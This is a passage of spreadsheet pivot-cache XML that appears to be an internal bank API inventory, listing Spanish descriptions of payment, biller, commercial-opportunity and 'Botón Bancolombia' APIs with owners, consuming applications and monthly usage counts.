    <s v="APIC_PRODUCTORCONSUMIDOR _x000d__x000a_ MascaraTransaccional_NU0021001 _x000d__x000a_ APIC_PRODUCTORCONSUMIDOR_PDN_CJGIRALD _x000d__x000a_ APIC_PRODUCTORCONSUMIDOR_PDN_YSEBASDO _x000d__x000a_ APIC_PRODUCTORCONSUMIDOR_PDN_JJESPITI _x000d__x000a_ APIC_PRODUCTORCONSUMIDOR_PDN_DANVA _x000d__x000a_ APIC_PRODUCTORCONSUMIDOR _x000d__x000a_ MonitoreoDCM_NU0084001 _x000d__x000a_ MonitoreoDCM_NU0084001_Recaudos"/>
    <n v="1803"/>
    <n v="2137"/>
    <n v="2203"/>
    <n v="1251"/>
    <n v="165"/>
    <x v="1"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2021-11-11T16:38:51"/>
    <s v="Bill Payment"/>
    <n v="160"/>
    <s v="Bill Payment - Scheduled Information"/>
    <n v="100"/>
    <s v="bill-payment-scheduled-information"/>
    <s v="La API Bill Payment - Scheduled Information permite consultar información sobre la programación de los pagos"/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Pagos y Recaudos"/>
    <s v="Gestión de flujos"/>
    <s v="Productor"/>
    <s v="Recaudos"/>
    <s v="Walter Andrés Gómez"/>
    <s v="ConsultaPagoProgramado/V1.0"/>
    <m/>
    <s v="APIC_PRODUCTORCONSUMIDOR _x000d__x000a_ MascaraTransaccional_NU0021001 _x000d__x000a_ APIC_PRODUCTORCONSUMIDOR_PDN_CJGIRALD _x000d__x000a_ APIC_PRODUCTORCONSUMIDOR_PDN_YSEBASDO _x000d__x000a_ APIC_PRODUCTORCONSUMIDOR_PDN_JJESPITI _x000d__x000a_ APIC_PRODUCTORCONSUMIDOR_PDN_DANVA _x000d__x000a_ APIC_PRODUCTORCONSUMIDOR _x000d__x000a_ MonitoreoDCM_NU0084001 _x000d__x000a_ MonitoreoDCM_NU0084001_Recaudos"/>
    <n v="109"/>
    <m/>
    <m/>
    <n v="10"/>
    <n v="21"/>
    <x v="1"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2021-11-03T19:50:55"/>
    <s v="Bill Payment"/>
    <n v="160"/>
    <s v="Bill Payment - Schedules"/>
    <n v="110"/>
    <s v="bill-payment-schedules"/>
    <s v="El API Bill Payment - Schedule le permitirá al consumidor gestionar la programación del pago de sus facturas. Podrá crear, eliminar y actualizar la programación del pago de sus facturas"/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Pagos y Recaudos"/>
    <s v="Gestión de flujos"/>
    <s v="Productor"/>
    <s v="Recaudos"/>
    <s v="Walter Andrés Gómez"/>
    <m/>
    <m/>
    <s v="APIC_PRODUCTORCONSUMIDOR _x000d__x000a_ MascaraTransaccional_NU0021001 _x000d__x000a_ APIC_PRODUCTORCONSUMIDOR_PDN_CJGIRALD _x000d__x000a_ APIC_PRODUCTORCONSUMIDOR_PDN_YSEBASDO _x000d__x000a_ APIC_PRODUCTORCONSUMIDOR_PDN_JJESPITI _x000d__x000a_ APIC_PRODUCTORCONSUMIDOR_PDN_DANVA _x000d__x000a_ APIC_PRODUCTORCONSUMIDOR _x000d__x000a_ MonitoreoDCM_NU0084001 _x000d__x000a_ MonitoreoDCM_NU0084001_Recaudos"/>
    <n v="2"/>
    <m/>
    <m/>
    <n v="24"/>
    <n v="2"/>
    <x v="1"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2021-11-03T19:50:55"/>
    <s v="Bill Payment"/>
    <n v="160"/>
    <s v="Bill Payments - Information Payer"/>
    <n v="101"/>
    <s v="bill-payment-information-payer"/>
    <s v="El API Bill Payments - Information Payer permitirá a los usuarios obtener información sobre los pagos de facturas realizados, en canales virtuales. La información podrá ser consultada en un rango de tiempo de máximo tres meses a partir del níºmero de identificación del pagador, adicional tendrá otras opciones para filtrar la consulta que facilitarán su proceso de bíºsqueda."/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Pagos y Recaudos"/>
    <s v="Gestión de flujos"/>
    <s v="Productor"/>
    <s v="Recaudos"/>
    <s v="Walter Andrés Gómez"/>
    <m/>
    <m/>
    <s v="APIC_PRODUCTORCONSUMIDOR _x000d__x000a_ MascaraTransaccional_NU0021001 _x000d__x000a_ APIC_PRODUCTORCONSUMIDOR_PDN_CJGIRALD _x000d__x000a_ APIC_PRODUCTORCONSUMIDOR_PDN_YSEBASDO _x000d__x000a_ APIC_PRODUCTORCONSUMIDOR_PDN_JJESPITI _x000d__x000a_ APIC_PRODUCTORCONSUMIDOR_PDN_DANVA _x000d__x000a_ APIC_PRODUCTORCONSUMIDOR _x000d__x000a_ MonitoreoDCM_NU0084001 _x000d__x000a_ MonitoreoDCM_NU0084001_Recaudos"/>
    <n v="225"/>
    <n v="474"/>
    <n v="387"/>
    <n v="253"/>
    <n v="236"/>
    <x v="1"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2020-11-26T13:56:03"/>
    <s v="Bill Payments Execution"/>
    <n v="100"/>
    <s v="Bill Payments Execution - Payments"/>
    <n v="100"/>
    <s v="bill-paymenst-execution-payments"/>
    <s v="La API permitirá a los consumidores realizar el pago de  Facturas previamente inscritas, deben estár asociadas a un convenio de recaudo. El pago podrá realizarse con debito a cuenta y efectivo. "/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Captaciones"/>
    <s v="Gestión de flujos"/>
    <s v="Productor"/>
    <s v="Recaudos"/>
    <s v="Walter Andrés Gómez"/>
    <s v="PagoFacturaConConvenio/V1.0"/>
    <m/>
    <s v="No tiene"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2020-05-20T10:56:01"/>
    <s v="Bill Payments Order"/>
    <n v="100"/>
    <s v="Bill Payments Order - Bills"/>
    <n v="100"/>
    <s v="bill-payment-order-bills"/>
    <s v="La API Bill Payments Order - Bills Permitirá a los consumidores realizar la consulta y eliminación de las facturas inscritas que tiene un cliente en particular, adicionalmente se podrá consultar el detalle de una factura programada para pagos automáticos mensuales."/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Pagos y Recaudos"/>
    <s v="Gestión de flujos"/>
    <s v="Productor"/>
    <s v="Recaudos"/>
    <s v="Walter Andrés Gómez"/>
    <s v=""/>
    <m/>
    <s v="ALM_AW0955001 _x000d__x000a_ MonitoreoDCM_NU0084001 _x000d__x000a_ ALM_AW0955 _x000d__x000a_ app1 _x000d__x000a_ AppAuditoriaApisEjemplo"/>
    <n v="363508"/>
    <n v="451080"/>
    <n v="548944"/>
    <n v="268199"/>
    <n v="301837"/>
    <x v="1"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2021-07-28T11:34:53"/>
    <s v="Biller"/>
    <n v="111"/>
    <s v="Biller - Management"/>
    <n v="100"/>
    <s v="biller-management"/>
    <s v="El API Biller - Management permitirá a los recaudadores hacer gestión sobre sus facturas."/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Pagos y Recaudos"/>
    <s v="Gestión de flujos"/>
    <s v="Productor"/>
    <s v="Pagos y Recaudos"/>
    <m/>
    <s v="AnulacionFacturaRecaudo/V1.0"/>
    <m/>
    <s v="APIC_PRODUCTORCONSUMIDOR _x000d__x000a_ MascaraTransaccional_NU0021001 _x000d__x000a_ APIC_PRODUCTORCONSUMIDOR_PDN_JJESPITI _x000d__x000a_ HabitatAdministraciones_NU0113001 _x000d__x000a_ APIC_PRODUCTORCONSUMIDOR_PDN_YSEBASDO _x000d__x000a_ MonitoreoDCM_NU0084001 _x000d__x000a_ APIC_PRODUCTORCONSUMIDOR_PDN_DANVA _x000d__x000a_ MonitoreoDCM_NU0084001_Recaudos _x000d__x000a_ APIC_PRODUCTORCONSUMIDOR"/>
    <n v="15090"/>
    <n v="13819"/>
    <n v="12767"/>
    <n v="13183"/>
    <n v="13692"/>
    <x v="1"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2021-11-10T14:48:58"/>
    <s v="Biller"/>
    <n v="111"/>
    <s v="Biller - Transactions"/>
    <n v="101"/>
    <s v="biller-transactions"/>
    <s v="El API Biller - Transactions permitirá consultar los movimientos de un convenio de recaudo, los datos son consultados a partir del tipo y níºmero de identificación del recaudador, estos datos deberán obtenerse en la api Collection Agreements - Information retrieveDetailAgreement, de manera opcional podrá consultar los movimientos a partir del codigo del convenio, la cuenta recaudadora, la forma de pago, el canal y el estado."/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Pagos y Recaudos"/>
    <s v="Gestión de flujos"/>
    <s v="Productor"/>
    <s v="Pagos y Recaudos"/>
    <m/>
    <m/>
    <m/>
    <s v="APIC_PRODUCTORCONSUMIDOR _x000d__x000a_ MascaraTransaccional_NU0021001 _x000d__x000a_ APIC_PRODUCTORCONSUMIDOR_PDN_JJESPITI _x000d__x000a_ HabitatAdministraciones_NU0113001 _x000d__x000a_ APIC_PRODUCTORCONSUMIDOR_PDN_YSEBASDO _x000d__x000a_ MonitoreoDCM_NU0084001 _x000d__x000a_ APIC_PRODUCTORCONSUMIDOR_PDN_DANVA _x000d__x000a_ MonitoreoDCM_NU0084001_Recaudos _x000d__x000a_ APIC_PRODUCTORCONSUMIDOR"/>
    <n v="1246"/>
    <n v="3347"/>
    <n v="6518"/>
    <n v="5956"/>
    <n v="10336"/>
    <x v="1"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2022-01-18T19:47:34"/>
    <s v="Biller Files"/>
    <n v="132"/>
    <s v="Biller Files - Files Sent"/>
    <n v="102"/>
    <s v="biller-files-files-sent"/>
    <s v="La API permite listar los archivos que el core de recaudos le ha enviado al recaudador, estos pueden contener información sobre los recaudos que fueron captadas (consolidado o tiempo real) o novedades"/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Pagos y Recaudos"/>
    <s v="Gestión de flujos"/>
    <s v="Productor"/>
    <s v="Pagos y Recaudos"/>
    <m/>
    <s v="ConsultaArchivosEnviadosRecaudador/V1.0"/>
    <m/>
    <s v="APIC_PRODUCTORCONSUMIDOR_PDN _x000d__x000a_ APIC_PRODUCTORCONSUMIDOR_PDN_YSEBASDO _x000d__x000a_ APIC_PRODUCTORCONSUMIDOR_PDN_DANVA _x000d__x000a_ APIC_PRODUCTORCONSUMIDOR_PDN_CJGIRALD _x000d__x000a_ MonitoreoDCM_NU0084001 _x000d__x000a_ APIC_PRODUCTORCONSUMIDOR _x000d__x000a_ APIC_PRODUCTORCONSUMIDOR _x000d__x000a_ APIC_PRODUCTORCONSUMIDOR"/>
    <n v="3"/>
    <n v="12"/>
    <n v="57"/>
    <n v="41"/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2021-10-25T22:24:24"/>
    <s v="Biller Files"/>
    <n v="132"/>
    <s v="Biller Files - Information"/>
    <n v="120"/>
    <s v="biller-files-information"/>
    <s v="Esta Api permite consultar la información de los archivos que son enviados por el recaudador, se tienen tres tipos de archivos, facturas, cobros y novedades. Se tienen dos operaciones que permitiran obtener información resumida de los archivos y luego obtener el detalle de la información de uno de ellos."/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Pagos y Recaudos"/>
    <s v="Gestión de flujos"/>
    <s v="Productor"/>
    <s v="Pagos y Recaudos"/>
    <m/>
    <s v="ConsultaArchivoRecaudos/V1.0"/>
    <m/>
    <s v="APIC_PRODUCTORCONSUMIDOR_PDN _x000d__x000a_ APIC_PRODUCTORCONSUMIDOR_PDN_YSEBASDO _x000d__x000a_ APIC_PRODUCTORCONSUMIDOR_PDN_DANVA _x000d__x000a_ APIC_PRODUCTORCONSUMIDOR_PDN_CJGIRALD _x000d__x000a_ MonitoreoDCM_NU0084001 _x000d__x000a_ APIC_PRODUCTORCONSUMIDOR _x000d__x000a_ APIC_PRODUCTORCONSUMIDOR _x000d__x000a_ APIC_PRODUCTORCONSUMIDOR"/>
    <m/>
    <n v="1"/>
    <n v="1"/>
    <m/>
    <n v="2"/>
    <x v="1"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2021-07-28T12:55:07"/>
    <s v="Biller Files"/>
    <n v="132"/>
    <s v="Biller Files - Management"/>
    <n v="120"/>
    <s v="biller-files-management"/>
    <s v="El API Biller File - Management permite gestionar los archivos del recaudador, como su anulación"/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Pagos y Recaudos"/>
    <s v="Gestión de flujos"/>
    <s v="Productor"/>
    <s v="Pagos y Recaudos"/>
    <m/>
    <s v="GestionArchivoRecaudo/V1.0"/>
    <m/>
    <s v="APIC_PRODUCTORCONSUMIDOR_PDN _x000d__x000a_ APIC_PRODUCTORCONSUMIDOR_PDN_YSEBASDO _x000d__x000a_ APIC_PRODUCTORCONSUMIDOR_PDN_DANVA _x000d__x000a_ APIC_PRODUCTORCONSUMIDOR_PDN_CJGIRALD _x000d__x000a_ MonitoreoDCM_NU0084001 _x000d__x000a_ APIC_PRODUCTORCONSUMIDOR _x000d__x000a_ APIC_PRODUCTORCONSUMIDOR _x000d__x000a_ APIC_PRODUCTORCONSUMIDOR"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="1"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Bloquear Desbloquear Usuario"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v="Permitir Bloquear ó Desbloquear el usuario de una persona natural para que no pueda utilizar el canal de las filiales Panamá/Cayman, Miami."/>
    <s v="FILIALES_DEL_EXTERIOR_Y_ALIADOS"/>
    <s v="Filiales del Exterior"/>
    <s v="Financiación y consumo"/>
    <s v="Productor"/>
    <s v="Filiales del Exterior"/>
    <m/>
    <m/>
    <s v="IAM"/>
    <s v="AW0718001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Bloquear Primera Segunda Clave SVP"/>
    <n v="200"/>
    <s v="No Aplica"/>
    <s v="Permitie Bloquear la primera o segunda clave a través de la sucursal virtual personas, ya sea por intentos de acceso errados o por solicitud del cliente para las filiales Panamá/Cayman, Miami"/>
    <s v="FILIALES_DEL_EXTERIOR_Y_ALIADOS"/>
    <s v="Filiales del Exterior"/>
    <s v="Financiación y consumo"/>
    <s v="Productor"/>
    <s v="Filiales del Exterior"/>
    <m/>
    <m/>
    <s v="IAM"/>
    <s v="AW0718001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="BM_SVE_Acceder Acuerdo Trade"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v="La funcionalidad de consulta le permite a un cliente realizar la solicitud de consultas de un producto Trade desde la Sucursal Virtual Empresas (SVE) hacia FINACLE."/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Captaciones"/>
    <s v="Financiación y consumo"/>
    <s v="Productor"/>
    <s v="Captaciones"/>
    <m/>
    <m/>
    <s v="FINACLE - COLOMBIA_TRADE_AW0684001"/>
    <s v="AW0360"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2021-05-20T14:52:35"/>
    <s v="Commercial Information"/>
    <n v="100"/>
    <s v="Branch Commercial Team"/>
    <n v="100"/>
    <s v="branch-commercial-team"/>
    <s v="La Api ofrece a los consumidores, la capacidad de obtener la información de los códigos CIF y CRM del equipo comercial de una sucursal, es decir su gerente, los asesores o vendedores y la identificación o código de la sucursal."/>
    <s v="CLIENTES"/>
    <s v="Gestion Cliente y Comercial"/>
    <s v="Conocimiento de clientes"/>
    <s v="Productor Transversal"/>
    <s v="No Aplica"/>
    <s v="John Jairo Gaviria Escobar"/>
    <m/>
    <m/>
    <s v="VisorInteractivo_AW1249001"/>
    <n v="106853"/>
    <n v="142489"/>
    <n v="192460"/>
    <n v="201563"/>
    <n v="202867"/>
    <x v="1"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2021-08-07T10:26:10"/>
    <s v="Business Opportunities"/>
    <n v="101"/>
    <s v="Business Opportunities - Consolidated"/>
    <n v="101"/>
    <s v="business-opportunities-consolidated"/>
    <s v="A través de esta operación se puede obtener todo el consolidado de oportunidades comerciales asignadas a un cliente."/>
    <s v="CLIENTES"/>
    <s v="Gestion Cliente y Comercial"/>
    <s v="Conocimiento de clientes"/>
    <s v="Productor"/>
    <s v="Oportunidades comerciales (STOC)"/>
    <s v="Natalia Andrea Rodas"/>
    <m/>
    <m/>
    <s v="VisorInteractivo_AW1249001 _x000d__x000a_ CGC_NU0014001 _x000d__x000a_ AdaptadorMarketplace_NU0143001 _x000d__x000a_ APP-PERSONAS_NU0146001 _x000d__x000a_ MascaraTransaccional_NU0021001 _x000d__x000a_ BNPL_NU0287001 _x000d__x000a_ MonitoreoDCM_NU0084001"/>
    <n v="26999459"/>
    <n v="87794372"/>
    <n v="87155684"/>
    <n v="88695635"/>
    <n v="103033730"/>
    <x v="1"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2021-10-04T17:21:00"/>
    <s v="Business Opportunities Sme"/>
    <n v="111"/>
    <s v="Business Opportunities - SME Generals Inquiry"/>
    <n v="102"/>
    <s v="business-opportunities-sme-generals-inquiry"/>
    <s v="La Api ofrece a los consumidores, la capacidad de obtener la información general de las oportunidades comerciales del segmento personas y Pyme a la carta, que resultan de los modelos analí­ticos del banco y que se entregan a la LZ."/>
    <s v="CLIENTES"/>
    <s v="Gestion Cliente y Comercial"/>
    <s v="Conocimiento de clientes"/>
    <s v="Productor"/>
    <s v="Oportunidades comerciales (STOC)"/>
    <s v="Natalia Andrea Rodas"/>
    <m/>
    <m/>
    <s v="MonitoreoDCM_NU0084001 _x000d__x000a_ VisorInteractivo_AW1249001 _x000d__x000a_ LimitsCreditExhibition_NU0114001"/>
    <n v="14794"/>
    <n v="14917"/>
    <n v="9655"/>
    <n v="9689"/>
    <n v="18352"/>
    <x v="1"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2021-10-04T17:21:00"/>
    <s v="Business Opportunities Sme"/>
    <n v="111"/>
    <s v="Business Opportunities - SME Management"/>
    <n v="102"/>
    <s v="business-opportunities-sme-management"/>
    <s v="La API tiene la gestion de las oportunidades comerciales pyme."/>
    <s v="CLIENTES"/>
    <s v="Gestion Cliente y Comercial"/>
    <s v="Conocimiento de clientes"/>
    <s v="Productor"/>
    <s v="Oportunidades comerciales (STOC)"/>
    <s v="Natalia Andrea Rodas"/>
    <m/>
    <m/>
    <s v="MonitoreoDCM_NU0084001 _x000d__x000a_ VisorInteractivo_AW1249001 _x000d__x000a_ LimitsCreditExhibition_NU0114001"/>
    <n v="11994"/>
    <n v="11289"/>
    <n v="9665"/>
    <n v="8328"/>
    <n v="12524"/>
    <x v="1"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2021-10-04T17:21:00"/>
    <s v="Business Opportunities Sme"/>
    <n v="111"/>
    <s v="Business Opportunities - SME PreApproved Inquiry"/>
    <n v="111"/>
    <s v="business-opportunities-sme-preapproved-inquiry"/>
    <s v="La Api ofrece a los consumidores, la capacidad de obtener la información general de las oportunidades comerciales de pre- aprobados de los clientes del segmento pyme, para pymes con estados financieros y preaprobados para pymes sin estados financieros, la api proporciona un método para cada grupo."/>
    <s v="CLIENTES"/>
    <s v="Gestion Cliente y Comercial"/>
    <s v="Conocimiento de clientes"/>
    <s v="Productor"/>
    <s v="Oportunidades comerciales (STOC)"/>
    <s v="Natalia Andrea Rodas"/>
    <m/>
    <m/>
    <s v="MonitoreoDCM_NU0084001 _x000d__x000a_ VisorInteractivo_AW1249001 _x000d__x000a_ LimitsCreditExhibition_NU0114001"/>
    <n v="11922"/>
    <n v="11141"/>
    <n v="9679"/>
    <n v="8338"/>
    <n v="12483"/>
    <x v="1"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2021-08-07T10:26:10"/>
    <s v="Business Opportunities"/>
    <n v="101"/>
    <s v="Business Opportunities MasterData"/>
    <n v="101"/>
    <s v="business-opportunities-masterdata"/>
    <s v="La Api ofrece a los consumidores, la capacidad de obtener la informacion general de los catalogos."/>
    <s v="CLIENTES"/>
    <s v="Gestion Cliente y Comercial"/>
    <s v="Conocimiento de clientes"/>
    <s v="Productor"/>
    <s v="Oportunidades comerciales (STOC)"/>
    <s v="Natalia Andrea Rodas"/>
    <m/>
    <m/>
    <s v="VisorInteractivo_AW1249001 _x000d__x000a_ CGC_NU0014001 _x000d__x000a_ AdaptadorMarketplace_NU0143001 _x000d__x000a_ APP-PERSONAS_NU0146001 _x000d__x000a_ MascaraTransaccional_NU0021001 _x000d__x000a_ BNPL_NU0287001 _x000d__x000a_ MonitoreoDCM_NU0084001"/>
    <n v="5947313"/>
    <n v="8781649"/>
    <n v="12202895"/>
    <n v="13129075"/>
    <n v="14781955"/>
    <x v="1"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2021-08-07T10:26:13"/>
    <s v="Business Opportunities Person"/>
    <n v="101"/>
    <s v="Business Opportunities Persons - Generals"/>
    <n v="101"/>
    <s v="business-opportunities-persons-generals"/>
    <s v="La API permite consultar las oportunidades comerciales del segmento personas, de un cliente en particular."/>
    <s v="CLIENTES"/>
    <s v="Gestion Cliente y Comercial"/>
    <s v="Conocimiento de clientes"/>
    <s v="Productor"/>
    <s v="Oportunidades comerciales (STOC)"/>
    <s v="Natalia Andrea Rodas"/>
    <m/>
    <m/>
    <s v="HabitatCore_AW1281003 _x000d__x000a_ MonitoreoDCM_NU0084001 _x000d__x000a_ MovilidadCore_AW1281002 _x000d__x000a_ VisorInteractivo_AW1249001 _x000d__x000a_ AdaptadorMarketplace_NU0143001 _x000d__x000a_ LoansOffer_NU0102001 _x000d__x000a_ MascaraTransaccional_NU0021001 _x000d__x000a_ EASYHOME_NU0004001 _x000d__x000a_ SUFIOriginacion_AW1097001 _x000d__x000a_ salesforceAdapter_NU0254001"/>
    <n v="368700"/>
    <n v="538061"/>
    <n v="711026"/>
    <n v="763093"/>
    <n v="836492"/>
    <x v="1"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2021-08-07T10:26:13"/>
    <s v="Business Opportunities Person"/>
    <n v="101"/>
    <s v="Business Opportunities Persons - Management"/>
    <n v="101"/>
    <s v="business-opportunities-persons-management"/>
    <s v="La API tiene la gestion de las oportunidades comerciales personas."/>
    <s v="CLIENTES"/>
    <s v="Gestion Cliente y Comercial"/>
    <s v="Conocimiento de clientes"/>
    <s v="Productor"/>
    <s v="Oportunidades comerciales (STOC)"/>
    <s v="Natalia Andrea Rodas"/>
    <m/>
    <m/>
    <s v="HabitatCore_AW1281003 _x000d__x000a_ MonitoreoDCM_NU0084001 _x000d__x000a_ MovilidadCore_AW1281002 _x000d__x000a_ VisorInteractivo_AW1249001 _x000d__x000a_ AdaptadorMarketplace_NU0143001 _x000d__x000a_ LoansOffer_NU0102001 _x000d__x000a_ MascaraTransaccional_NU0021001 _x000d__x000a_ EASYHOME_NU0004001 _x000d__x000a_ SUFIOriginacion_AW1097001 _x000d__x000a_ salesforceAdapter_NU0254001"/>
    <n v="94559"/>
    <n v="132745"/>
    <n v="147349"/>
    <n v="156828"/>
    <n v="171153"/>
    <x v="1"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2021-08-07T10:26:13"/>
    <s v="Business Opportunities Person"/>
    <n v="101"/>
    <s v="Business Opportunities Persons-Preapproved"/>
    <n v="101"/>
    <s v="business-opportunities-persons-preapproved"/>
    <s v="La API permite consultar los pre-aprobados del segmento personas, de un cliente en particular."/>
    <s v="CLIENTES"/>
    <s v="Gestion Cliente y Comercial"/>
    <s v="Conocimiento de clientes"/>
    <s v="Productor"/>
    <s v="Oportunidades comerciales (STOC)"/>
    <s v="Natalia Andrea Rodas"/>
    <m/>
    <m/>
    <s v="HabitatCore_AW1281003 _x000d__x000a_ MonitoreoDCM_NU0084001 _x000d__x000a_ MovilidadCore_AW1281002 _x000d__x000a_ VisorInteractivo_AW1249001 _x000d__x000a_ AdaptadorMarketplace_NU0143001 _x000d__x000a_ LoansOffer_NU0102001 _x000d__x000a_ MascaraTransaccional_NU0021001 _x000d__x000a_ EASYHOME_NU0004001 _x000d__x000a_ SUFIOriginacion_AW1097001 _x000d__x000a_ salesforceAdapter_NU0254001"/>
    <n v="149028"/>
    <n v="229099"/>
    <n v="272763"/>
    <n v="327707"/>
    <n v="370283"/>
    <x v="1"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2021-11-10T10:08:52"/>
    <s v="Button"/>
    <n v="101"/>
    <s v="Button - Account"/>
    <n v="100"/>
    <s v="button-account"/>
    <s v="El api Button Account permite consultar las cuentas de un cliente que cumplan con las codiciones para pagar por medio del producto Botón Bancolombia."/>
    <s v="MEDIOS_DE_PAGO"/>
    <s v="Debito y Prepago"/>
    <s v="Gestión de flujos"/>
    <s v="Productor"/>
    <s v="Pagos"/>
    <m/>
    <m/>
    <m/>
    <s v="MonitoreoDCM_NU0084001 _x000d__x000a_ One Click Payment_NU0199001"/>
    <m/>
    <m/>
    <m/>
    <n v="73"/>
    <n v="13435"/>
    <x v="1"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2021-11-10T10:08:52"/>
    <s v="Button"/>
    <n v="101"/>
    <s v="Button - Information"/>
    <n v="101"/>
    <s v="button-information"/>
    <s v="Esta api permite llevar a cabo las siguientes funcionalidades de consulta relacionadas con el servicio Botón Bancolombia.   - Consultar vinculación comercio/cliente, Permite listar los comercios vinculados a Botón - Consultar botones cliente, Permite listar los botones de todos los comercios asociados a un cliente, así­ como filtrar los botones generados por comercio, rango de fechas de creación, estado del botón (Activo, Inactivo, Retirado). - Consultar Detalle del Comercio, Capacidad que permite mostrar el detalle de los comercios vinculados a Botón. - Consultar Detalle de un Botón, Capacidad que permite mostrar el detalle de un botón."/>
    <s v="MEDIOS_DE_PAGO"/>
    <s v="Debito y Prepago"/>
    <s v="Gestión de flujos"/>
    <s v="Productor"/>
    <s v="Pagos"/>
    <m/>
    <m/>
    <m/>
    <s v="MonitoreoDCM_NU0084001 _x000d__x000a_ One Click Payment_NU0199001"/>
    <n v="2980"/>
    <n v="2782"/>
    <n v="2423"/>
    <n v="2123"/>
    <n v="2366"/>
    <x v="1"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2021-11-10T10:08:52"/>
    <s v="Button"/>
    <n v="101"/>
    <s v="Button - Management"/>
    <n v="101"/>
    <s v="button-management"/>
    <s v="## **Button - Management** El api Button - Management permite realizar diferentes operaciones relacionadas con el botón Bancolombia: **1. Crear Botón:** Permite la creación de un botón al servicio de Botón Bancolombia   **2. Modificar Información de Botón:** Esta operación permite actualizar la información de un botón generado por un comercio vinculado en Botón Bancolombia. La información que se puede modificar es la siguiente:   - Fecha de vencimiento del botón.   - Referencia.   - Nombre.   - Descripción.   - Valor por unidad.   - Cantidad de productos.   **3. Estado de Boton:** Permite cambiar el estado de uno o varios botones generados por un comercio vinculado a Botón Bancolombia. Los estados se pueden cambiar entre  - ACTIVO  - INACTIVO  - RETIRADO       Para realizar el cambio de estado, la bíºsqueda se puede realizar por botón, identificador íºnico de comercio, o datos de identificación del comercio guardados en la vinculación al producto Botón Bancolombia (tipo y níºmero de documento). Si la bíºsqueda se realiza por tipo y níºmero de documento o identificador íºnico del comercio, el cambio de estado de botón aplicará a todos los botones asociados al comercio."/>
    <s v="MEDIOS_DE_PAGO"/>
    <s v="Debito y Prepago"/>
    <s v="Gestión de flujos"/>
    <s v="Productor"/>
    <s v="Pagos"/>
    <m/>
    <m/>
    <m/>
    <s v="MonitoreoDCM_NU0084001 _x000d__x000a_ One Click Payment_NU0199001"/>
    <n v="2979"/>
    <n v="2783"/>
    <n v="2312"/>
    <n v="2126"/>
    <n v="2382"/>
    <x v="1"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2021-11-10T10:08:52"/>
    <s v="Button"/>
    <n v="101"/>
    <s v="Button - Onboarding"/>
    <n v="101"/>
    <s v="button-onboarding"/>
    <s v="## **Button - Onboarding**  Permite llevar a cabo las siguientes funcionalidades relacionadas con el servicio Botón Bancolombia: **1. Vinculación del Comercio:** Permite realizar la vinculación de un comercio realizando la inscripción al servicio Botón Bancolombia para habilitar su Uso.   **2. Modificar Vinculación comercio:** Permite Modificar la información de vinculación en el servicio de Botón Bancolombia.    **3. Cambio de estado:** Permite realizar un cambio de estado de un comercio relacionado a la vinculación en Botón Bancolombia."/>
    <s v="MEDIOS_DE_PAGO"/>
    <s v="Debito y Prepago"/>
    <s v="Gestión de flujos"/>
    <s v="Productor"/>
    <s v="Pagos"/>
    <m/>
    <m/>
    <m/>
    <s v="MonitoreoDCM_NU0084001 _x000d__x000a_ One Click Payment_NU0199001"/>
    <n v="2982"/>
    <n v="2777"/>
    <n v="2430"/>
    <n v="2128"/>
    <n v="2373"/>
    <x v="1"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2021-11-10T10:08:52"/>
    <s v="Button"/>
    <n v="101"/>
    <s v="Button - Technical Setting"/>
    <n v="101"/>
    <s v="button-technical-setting"/>
    <s v="Esta api permite llevar a cabo las siguientes funcionalidades relacionadas con el servicio Botón Bancolombia   - Registro de Información Técnica del reporte: Permite  Almacenar la Información  Técnica  del reporte  parametrización para configuración la  transmisión de archivos   (Sterling). - Registro de Información Técnica del CallBack: Permite realizar el registro de información del comercio con las Llaves privadas para Credenciales CallBack. - Modificar la Información Técnica del reporte: Permite realizar la modificación de la de información del reporte.   - Modificar la información técnica del CallBack: Permite realizar la modificación de las credenciales del CallBack."/>
